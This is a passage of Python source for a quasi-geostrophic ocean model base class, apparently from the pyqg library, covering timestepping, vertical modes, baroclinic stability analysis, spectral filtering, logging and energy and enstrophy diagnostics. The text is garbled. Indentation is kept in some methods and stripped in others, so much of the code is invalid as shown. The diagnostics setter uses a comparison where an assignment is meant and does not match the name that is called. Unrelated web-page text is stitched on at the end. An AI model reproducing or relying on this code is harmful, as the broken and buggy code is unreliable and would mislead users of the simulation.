        Time interval for accumulation of diagnostic averages.
        Units: seconds. (For performance purposes, averaging does not have to
        occur every timestep)
    tsnapint : number
        Time interval for snapshots. Units: seconds.
    ntd : int
        Number of threads to use. Should not exceed the number of cores on
        your machine.
    q_parameterization : function or pyqg.Parameterization
        Optional :code:`Parameterization` object or function which takes
        the model as input and returns a :code:`numpy` array of shape
        :code:`(nz, ny, nx)` to be added to :math:`\partial_t q` before
        stepping forward. This can be used to implement subgrid forcing
        parameterizations.
    uv_parameterization : function or pyqg.Parameterization
        Optional :code:`Parameterization` object or function which takes
        the model as input and returns a tuple of two :code:`numpy` arrays,
        each of shape :code:`(nz, ny, nx)`, to be added to the zonal and
        meridional velocity derivatives (respectively) at each timestep (by
        adding their curl to :math:`\partial_t q`). This can also be used
        to implement subgrid forcing parameterizations, but expressed in
        terms of velocity rather than potential vorticity.
    parameterization : pyqg.Parameterization
        An explicit :code:`Parameterization` object representing either a
        velocity or potential vorticity parameterization, whose type will
        be inferred.
    """
    if ny is None:
        ny = nx
    if W is None:
        W = L

    # if an explicit parameterization object was passed without a given
    # type, infer it from its attributes
    if parameterization is not None:
        ptype = getattr(parameterization, "parameterization_type", None)
        if ptype == 'uv_parameterization':
            assert uv_parameterization is None
            uv_parameterization = parameterization
        elif ptype == 'q_parameterization':
            assert q_parameterization is None
            q_parameterization = parameterization
        else:
            raise ValueError(f"unknown parameterization type {ptype}")

    # TODO: be more clear about what attributes are cython and what
    # attributes are python
    PseudoSpectralKernel.__init__(self, nz, ny, nx, ntd,
        has_q_param=int(q_parameterization is not None),
        has_uv_param=int(uv_parameterization is not None))

    self.L = L
    self.W = W

    # timestepping
    self.dt = dt
    self.twrite = twrite
    self.tmax = tmax
    self.tavestart = tavestart
    self.taveint = taveint
    self.logfile = logfile
    self.log_level = log_level
    self.useAB2 = useAB2
    self.ntd = ntd

    # friction
    self.rek = rek
    self.filterfac = filterfac

    # constants
    self.g = g
    # NOTE(review): truthiness check, so f=0 is treated the same as "no f
    # supplied"; `if f is not None:` would be stricter.
    if f:
        self.f = f
        self.f2 = f**2

    # optional subgrid parameterizations
    self.q_parameterization = q_parameterization
    self.uv_parameterization = uv_parameterization

    # TODO: make this less complicated!
    # Really we just need to initialize the grid here. It's not necessary
    # to have all these silly methods. Maybe we need "hooks" instead.
    self._initialize_logger()
    self._initialize_grid()
    self._initialize_background()
    self._initialize_forcing()
    self._initialize_filter()
    self._initialize_time()
    self._initialize_inversion_matrix()
    self._initialize_diagnostics(diagnostics_list)
def run_with_snapshots(self, tsnapstart=0., tsnapint=432000.):
    """Run the model forward, yielding to user code at specified intervals.

    Parameters
    ----------
    tsnapstart : number
        Model time (same units as ``t``, not a timestep count) at which to
        begin yielding.
    tsnapint : number
        The interval at which to yield, rounded up to a whole number of
        timesteps.
    """
    # Number of timesteps between snapshots.
    tsnapints = np.ceil(tsnapint/self.dt)

    while(self.t < self.tmax):
        self._step_forward()
        if self.t >= tsnapstart and (self.tc % tsnapints) == 0:
            yield self.t
    return
def run(self):
    """Step the model forward until ``t`` reaches ``tmax``, never yielding."""
    while self.t < self.tmax:
        self._step_forward()
def vertical_modes(self):
    """Calculate standard vertical modes: simply the eigenvectors of the
    stretching matrix S.

    Sets ``kdi2`` (eigenvalues of -S, ascending), ``radii`` (deformation
    radii) and ``pmodes`` (vertical pressure modes, normalized to unit
    thickness-weighted L2 norm).
    """
    evals, evecs = np.linalg.eig(-self.S)
    asort = evals.argsort()

    # deformation wavenumbers and radii
    self.kdi2 = evals[asort]
    self.radii = np.zeros_like(self.kdi2)
    # The first (barotropic) mode gets sqrt(g H)/|f| instead of 1/kd.
    self.radii[0] = np.sqrt(self.g*self.H)/np.abs(self.f)  # barotropic def. radius
    self.radii[1:] = 1./np.sqrt(self.kdi2[1:])

    # eigenstructure
    self.pmodes = evecs[:, asort]
    # normalize to have unit L2-norm, weighted by the layer thicknesses Hi/H
    Ai = (self.H / (self.Hi[:, np.newaxis]*(self.pmodes**2)).sum(axis=0))**0.5
    self.pmodes = Ai[np.newaxis, :]*self.pmodes
def modal_projection(self, p, forward=True):
    """Project a field ``p`` onto the vertical-mode basis ``pmodes``.

    With ``forward=True``, returns the modal amplitudes of ``p`` (solves
    the linear system in the mode basis); with ``forward=False``, performs
    the inverse transform, reconstructing ``p`` from modal amplitudes.
    """
    if forward:
        pt = np.linalg.solve(self.pmodes[np.newaxis, np.newaxis], p.T).T
    else:
        pt = np.einsum("ik,k...->i...", self.pmodes, p)
    return pt
def stability_analysis(self, bottom_friction=False):
    r"""Performs the baroclinic linear instability analysis given
    the base state velocity :math:`(U, V)` and
    the stretching matrix :math:`S`:

    .. math:: A \Phi = \omega B \Phi,

    where

    .. math:: A = B (U k + V l) + I (k Q_y - l Q_x) +
                  1j \delta_{N N} r_{ek} I \kappa^2

    where :math:`\delta_{N N} = [0,0,\dots,0,1]`,

    and

    .. math:: B = S - I \kappa^2 .

    The eigenstructure is :math:`\Phi` and the eigenvalue is
    :math:`\omega`. The growth rate is Im\ :math:`\{\omega\}`.

    Parameters
    ----------
    bottom_friction : bool, optional
        Include linear bottom drag in the linear stability calculation
        (default is False, as if :math:`r_{ek} = 0`).

    Returns
    -------
    omega : complex array
        The eigenvalues with largest complex part (units: inverse model time)
    phi : complex array
        The eigenvectors associated with omega (unitless)
    """
    omega = np.zeros_like(self.wv) + 0.j
    phi = np.zeros_like(self.qh)

    I = np.eye(self.nz)
    # B = S - I kappa^2 and the PV-gradient term
    L2 = self.S[:, :, np.newaxis, np.newaxis] - self.wv2*I[:, :, np.newaxis, np.newaxis]
    Q = I[:, :, np.newaxis, np.newaxis]*(self.ikQy - self.ilQx).imag
    Uk = (self.Ubg*I)[:, :, np.newaxis, np.newaxis]*self.k
    Vl = (self.Vbg*I)[:, :, np.newaxis, np.newaxis]*self.l
    L3 = np.einsum('ij...,jk...->ik...', L2, Uk+Vl) + 0j

    if bottom_friction:
        # add the linear drag term to the lowest layer only
        L3[-1, -1, :, :] += 1j*self.rek*self.wv2

    L4 = self.a.T
    M = np.einsum('...ij,...jk->...ik', L4, (L3+Q).T)

    evals, evecs = np.linalg.eig(M)
    evals, evecs = evals.T, evecs.T

    # sorting things this way proved much faster than using numpy's argsort()!
    imax = evals.imag.argmax(axis=0)
    for i in range(self.nl):
        for j in range(self.nk):
            # keep, at each wavenumber, the eigenpair with the largest
            # growth rate (imaginary part)
            omega[i, j] = evals[imax[i, j], i, j]
            phi[:, i, j] = evecs[imax[i, j], :, i, j]

    return omega, phi
def subgrid_forcing(self, **kwargs):
    """Removed API — intentionally raises; see the linked PR for details."""
    raise ValueError(
        "This method was found to be buggy and removed for now. "
        "It will be re-added in a future release. "
        "See https://github.com/pyqg/pyqg/pull/308 for details. "
    )
### PRIVATE METHODS - not meant to be called by user ###

def _step_forward(self):
    """Advance the model by one timestep: invert, advect, apply friction,
    forcing and any subgrid parameterizations, record diagnostics, then
    apply the accumulated tendencies (the spectral filter is applied inside
    ``_forward_timestep``)."""
    self._invert()
    # find streamfunction from pv
    self._do_advection()
    # use streamfunction to calculate advection tendency
    self._do_friction()
    # apply friction
    self._do_external_forcing()
    # apply external forcing
    if self.uv_parameterization is not None:
        self._do_uv_subgrid_parameterization()
        # apply velocity subgrid forcing term, if present
    if self.q_parameterization is not None:
        self._do_q_subgrid_parameterization()
        # apply potential vorticity subgrid forcing term, if present
    self._calc_diagnostics()
    # do what has to be done with diagnostics
    self._forward_timestep()
    # apply tendencies to step the model forward
    # (filter gets called here)
    self._print_status()
def _initialize_time(self):
    """Set up timestep stuff"""
    #self.t=0 # actual time
    #self.tc=0 # timestep number
    # number of timesteps between diagnostic accumulations (rounded up)
    self.taveints = np.ceil(self.taveint/self.dt)
### initialization routines, only called once at the beginning ###
# TODO: clean up and simplify this whole routine
def _initialize_grid(self):
    """Set up spatial and spectral grids and related constants"""
    # cell-centered physical grid coordinates
    self.x, self.y = np.meshgrid(
        np.arange(0.5, self.nx, 1.)/self.nx*self.L,
        np.arange(0.5, self.ny, 1.)/self.ny*self.W)

    # Notice: at xi=1 U=beta*rd^2 = c for xi>1 => U>c

    # wavenumber one (equals to dkx/dky)
    self.dk = 2.*pi/self.L
    self.dl = 2.*pi/self.W

    # wavenumber grids
    # set in kernel
    #self.nl = self.ny
    #self.nk = int(self.nx/2+1)
    # NOTE(review): the meridional wavenumbers below are built from nx, not
    # ny — consistent with the class docstring's warning that nx != ny is
    # unsupported; confirm before using rectangular grids.
    self.ll = self.dl*np.append(np.arange(0., self.nx/2),
        np.arange(-self.nx/2, 0.))
    self.kk = self.dk*np.arange(0., self.nk)

    self.k, self.l = np.meshgrid(self.kk, self.ll)
    self.ik = 1j*self.k
    self.il = 1j*self.l
    # physical grid spacing
    self.dx = self.L / self.nx
    self.dy = self.W / self.ny

    # constant for spectral normalizations
    self.M = self.nx*self.ny

    # isotropic wavenumber^2 grid
    # the inversion is not defined at kappa = 0
    self.wv2 = self.k**2 + self.l**2
    self.wv = np.sqrt(self.wv2)

    # reciprocal of wv^2, with the singular kappa = 0 entry left at zero
    iwv2 = self.wv2 != 0.
    self.wv2i = np.zeros_like(self.wv2)
    self.wv2i[iwv2] = self.wv2[iwv2]**-1
def _initialize_background(self):
    # abstract hook: subclasses define the background state (e.g. Ubg, Qy)
    raise NotImplementedError(
        'needs to be implemented by Model subclass')

def _initialize_inversion_matrix(self):
    # abstract hook: subclasses build the PV-inversion matrix `a`
    raise NotImplementedError(
        'needs to be implemented by Model subclass')

def _initialize_forcing(self):
    # abstract hook: subclasses set up any forcing terms
    raise NotImplementedError(
        'needs to be implemented by Model subclass')
def _initialize_filter(self):
    """Build the exponential spectral filter following Arbic and Flierl
    (2003) and store it as ``self.filtr``."""
    cutoff = 0.65*pi
    scaled_wv = np.sqrt((self.k*self.dx)**2. + (self.l*self.dy)**2.)
    spectral_filter = np.exp(-self.filterfac*(scaled_wv - cutoff)**4.)
    # no damping below the cutoff wavenumber
    spectral_filter[scaled_wv <= cutoff] = 1.
    self.filtr = spectral_filter
def _filter(self, q):
    # apply the spectral filter built in _initialize_filter (elementwise)
    return self.filtr * q
def _do_external_forcing(self):
    # hook for subclasses/users; the base model applies no external forcing
    pass
# logger
def _initialize_logger(self):
    """Attach a file or stream handler and set verbosity from log_level."""
    self.logger = logging.getLogger(__name__)

    if not (self.logfile is None):
        fhandler = logging.FileHandler(filename=self.logfile, mode='w')
    else:
        fhandler = logging.StreamHandler()

    formatter = logging.Formatter('%(levelname)s: %(message)s')

    fhandler.setFormatter(formatter)

    # avoid attaching duplicate handlers when several models are created
    if not self.logger.handlers:
        self.logger.addHandler(fhandler)

    # log_level 0..4 maps onto the logging module's 0..40 scale
    self.logger.setLevel(self.log_level*10)

    # this prevents the logger to propagate into the ipython notebook log
    self.logger.propagate = False

    self.logger.info(' Logger initialized')
# compute advection in grid space (returns qdot in fourier space)
# *** don't remove! needed for diagnostics (but not forward model) ***
def _advect(self, q, u=None, v=None):
    """Given real inputs q, u, v, returns the advective tendency for
    q in spectral space: ik*FFT(u q) + il*FFT(v q). Defaults to the
    model's own velocity fields when u/v are omitted."""
    if u is None:
        u = self.u
    if v is None:
        v = self.v
    uq = u*q
    vq = v*q
    # this is a hack, since fft now requires input to have shape (nz,ny,nx)
    # it does an extra unnecessary fft
    is_2d = (uq.ndim == 2)
    if is_2d:
        uq = np.tile(uq[np.newaxis, :, :], (self.nz, 1, 1))
        vq = np.tile(vq[np.newaxis, :, :], (self.nz, 1, 1))
    tend = self.ik*self.fft(uq) + self.il*self.fft(vq)
    if is_2d:
        return tend[0]
    else:
        return tend
# def _filter(self, q):
# """Apply filter to field q."""
# return q
def _print_status(self):
"""Output some basic stats."""
if (self.log_level) and ((self.tc % self.twrite)==0):
self.ke = self._calc_ke()
self.cfl = self._calc_cfl()
#print 't=%16d, tc=%10d: cfl=%5.6f, ke=%9.9f' % (
# self.t, self.tc, cfl, ke)
self.logger.info('Step: %i, Time: %3.2e, KE: %3.2e, CFL: %4.3f'
, self.tc,self.t,self.ke,self.cfl )
assert self.cfl<1., self.logger.error('CFL condition violated')
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart) and (self.tc%self.taveints==0):
self._increment_diagnostics()
# def _forward_timestep(self):
# """Step forward based on tendencies"""
#
# #self.dqhdt = self.dqhdt_adv + self.dqhdt_forc
#
# # Note that Adams-Bashforth is not self-starting
# if self.tc==0:
# # forward Euler at the first step
# qtend = tendency_forward_euler(self.dt, self.dqhdt)
# elif (self.tc==1) or (self.useAB2):
# # AB2 at step 2
# qtend = tendency_ab2(self.dt, self.dqhdt, self.dqhdt_p)
# else:
# # AB3 from step 3 on
# qtend = tendency_ab3(self.dt, self.dqhdt,
# self.dqhdt_p, self.dqhdt_pp)
#
# # add tendency and filter
# self.set_qh(self._filter(self.qh + qtend))
#
# # remember previous tendencies
# self.dqhdt_pp[:] = self.dqhdt_p.copy()
# self.dqhdt_p[:] = self.dqhdt.copy()
# #self.dqhdt[:] = 0.
#
# # augment timestep and current time
# self.tc += 1
# self.t += self.dt
### All the diagnostic stuff follows. ###
def _calc_cfl(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
# this is stuff the Cesar added
# if self.tc==0:
# assert self.calc_cfl()<1., " *** time-step too large "
# # initialize ke and time arrays
# self.ke = np.array([self.calc_ke()])
# self.eddy_time = np.array([self.calc_eddy_time()])
# self.time = np.array([0.])
def _calc_ke(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_diagnostics(self, diagnostics_list):
# Initialization for diagnotics
self.diagnostics = dict()
self._initialize_core_diagnostics()
self._initialize_model_diagnostics()
if diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif diagnostics_list == 'none':
self.set_active_diagnostics([])
else:
self.set_active_diagnostics(diagnostics_list)
    def _initialize_core_diagnostics(self):
        """Diagnostics common to all models.

        Each entry is registered via ``add_diagnostic`` with a callable that
        receives the model instance and is evaluated at averaging time.
        """
        # layer-wise enstrophy spectrum |qh|^2 / M^2
        self.add_diagnostic('Ensspec',
                description='enstrophy spectrum',
                function= (lambda self: np.abs(self.qh)**2/self.M**2),
                units='s^-2',
                dims=('lev','l','k')
        )

        # layer-wise KE spectrum wv2*|ph|^2 / M^2
        self.add_diagnostic('KEspec',
                description='kinetic energy spectrum',
                function= (lambda self: self.wv2*np.abs(self.ph)**2/self.M**2),
                units='m^2 s^-2',
                dims=('lev','l','k')
        ) # factor of 2 to account for the fact that we have only half of
          # the Fourier coefficients.
          # NOTE(review): no explicit factor of 2 appears in the KEspec lambda
          # above — confirm whether it is applied downstream (cf. spec_var).

        # domain-mean bottom-drag dissipation, weighted by bottom-layer depth
        self.add_diagnostic('EKEdiss',
                description='total energy dissipation by bottom drag',
                function= (lambda self: self.Hi[-1]/self.H*self.rek*(self.v[-1]**2 + self.u[-1]**2).mean()),
                units='m^2 s^-3',
                dims=('time',)
        )

        # spectral counterpart of EKEdiss (bottom layer only)
        self.add_diagnostic('KEfrictionspec',
                description='total energy dissipation spectrum by bottom drag',
                function= (lambda self: -self.rek*self.Hi[-1]/self.H*self.wv2*np.abs(self.ph[-1])**2/self.M**2),
                units='m^2 s^-3',
                dims=('l','k')
        )

        # per-layer mean eddy kinetic energy in grid space
        self.add_diagnostic('EKE',
                description='mean eddy kinetic energy',
                function= (lambda self: 0.5*(self.v**2 + self.u**2).mean(axis=-1).mean(axis=-1)),
                units='m^2 s^-2',
                dims=('lev',)
        )

        def dissipation_spectrum(m):
            """Spectral tendency removed by the filter over one timestep.

            The dt weights mirror the time-stepping scheme in use (forward
            Euler, then AB2, then AB3), selected by ``m.ablevel`` — assumed
            to track the stepper's state; confirm against the forward step.
            """
            spectrum = np.zeros_like(m.qh)
            ones = np.ones_like(m.filtr)
            if m.ablevel==0:
                # forward euler
                dt1 = m.dt
                dt2 = 0.0
                dt3 = 0.0
            elif m.ablevel==1:
                # AB2 at step 2
                dt1 = 1.5*m.dt
                dt2 = -0.5*m.dt
                dt3 = 0.0
            else:
                # AB3 from step 3 on
                dt1 = 23./12.*m.dt
                dt2 = -16./12.*m.dt
                dt3 = 5./12.*m.dt
            for k in range(m.nz):
                # (filtr - 1) * predicted qh = the part the filter removes
                spectrum[k] = (m.filtr - ones) * (
                    m.qh[k] + dt1*m.dqhdt[k] + dt2*m.dqhdt_p[k] + dt3*m.dqhdt_pp[k])
            return spectrum

        # depth-weighted projection of the filter's removal onto energy
        self.add_diagnostic('Dissspec',
                description='Spectral contribution of filter dissipation to total energy',
                function=(lambda self: -np.tensordot(self.Hi,
                    np.conj(self.ph)*dissipation_spectrum(self), axes=(0, 0)).real/self.H/self.dt/self.M**2),
                units='m^2 s^-3',
                dims=('l','k')
        )

        # depth-weighted projection of the filter's removal onto enstrophy
        self.add_diagnostic('ENSDissspec',
                description='Spectral contribution of filter dissipation to barotropic enstrophy',
                function=(lambda self: np.tensordot(self.Hi,
                    np.conj(self.qh)*dissipation_spectrum(self), axes=(0, 0)).real/self.H/self.dt/self.M**2),
                units='s^-3',
                dims=('l','k')
        )

        # subgrid parameterization contributions; skip_comparison presumably
        # excludes these from regression comparisons — confirm in test suite
        self.add_diagnostic('paramspec',
                description='Spectral contribution of subgrid parameterization to energy (if present)',
                function=lambda self: self._calc_parameterization_spectrum(),
                units='m^2 s^-3',
                dims=('l','k'),
                skip_comparison=True,
        )

        self.add_diagnostic('ENSparamspec',
                description='Spectral contribution of subgrid parameterization to enstrophy',
                function=lambda self: self._calc_parameterization_enstrophy_spectrum(),
                units='s^-3',
                dims=('l','k'),
                skip_comparison=True,
        )
def _calc_parameterization_contribution(self):
dqh = np.zeros_like(self.qh)
if self.uv_parameterization is not None:
ik = np.asarray(self._ik).reshape((1, -1)).repeat(self.wv2.shape[0], axis=0)
il = np.asarray(self._il).reshape((-1, 1)).repeat(self.wv2.shape[-1], axis=-1)
dqh += -il * self.duh + ik * self.dvh
if self.q_parameterization is not None:
dqh += self.dqh
return dqh
def _calc_parameterization_spectrum(self):
dqh = self._calc_parameterization_contribution()
height_ratios = (self.Hi / self.H)[:,np.newaxis,np.newaxis]
return -np.real((height_ratios * np.conj(self.ph) * dqh).sum(axis=0)) / self.M**2
def _calc_parameterization_enstrophy_spectrum(self):
dqh = self._calc_parameterization_contribution()
height_ratios = (self.Hi / self.H)[:,np.newaxis,np.newaxis]
return np.real((height_ratios * np.conj(self.qh) * dqh).sum(axis=0)) / self.M**2
    def _calc_derived_fields(self):
        """Compute intermediate fields needed by diagnostics.

        Should be implemented by subclass; no-op in the base class.
        """
        pass
    def _initialize_model_diagnostics(self):
        """Register model-specific diagnostics.

        Should be implemented by subclass; no-op in the base class.
        """
        pass
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
self.diagnostics[d]['active'] == (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, function=None, units=None, dims=None, **kw):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'dims': dims,
'active': True,
'count': 0,
'function': function, }
# add any additional properties
self.diagnostics[diag_name].update(**kw)
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = list(self.diagnostics.keys())
diag_names.sort()
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}'.format(
*(k, d['description'])))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def get_diagnostic(self, dname):
if 'value' not in self.diagnostics[dname]:
raise DiagnosticNotFilledError(dname)
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def set_qh(self, qh):
warnings.warn("Method deprecated. Set model.qh directly instead. ",
DeprecationWarning)
self.qh = qh
def set_q(self, q):
warnings.warn("Method deprecated. Set model.q directly instead. ",
DeprecationWarning)
self.q = q
    def to_dataset(self):
        """Convert outputs from model to an xarray dataset

        Returns
        -------
        ds : xarray.Dataset
        """
        # imported lazily so xarray remains an optional dependency
        from .xarray_output import model_to_dataset
        return model_to_dataset(self)
@property
def parameterization(self):
"""Return the model's parameterization if present (either in terms of
PV or velocity, warning if there are both).
Returns
-------
parameterization : pyqg.Parameterization or function
"""
if self.q_parameterization and self.uv_parameterization:
warnings.warn("Model has multiple parameterizations, "\
"but only returning PV")
return self.q_parameterization or self.uv_parameterization
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.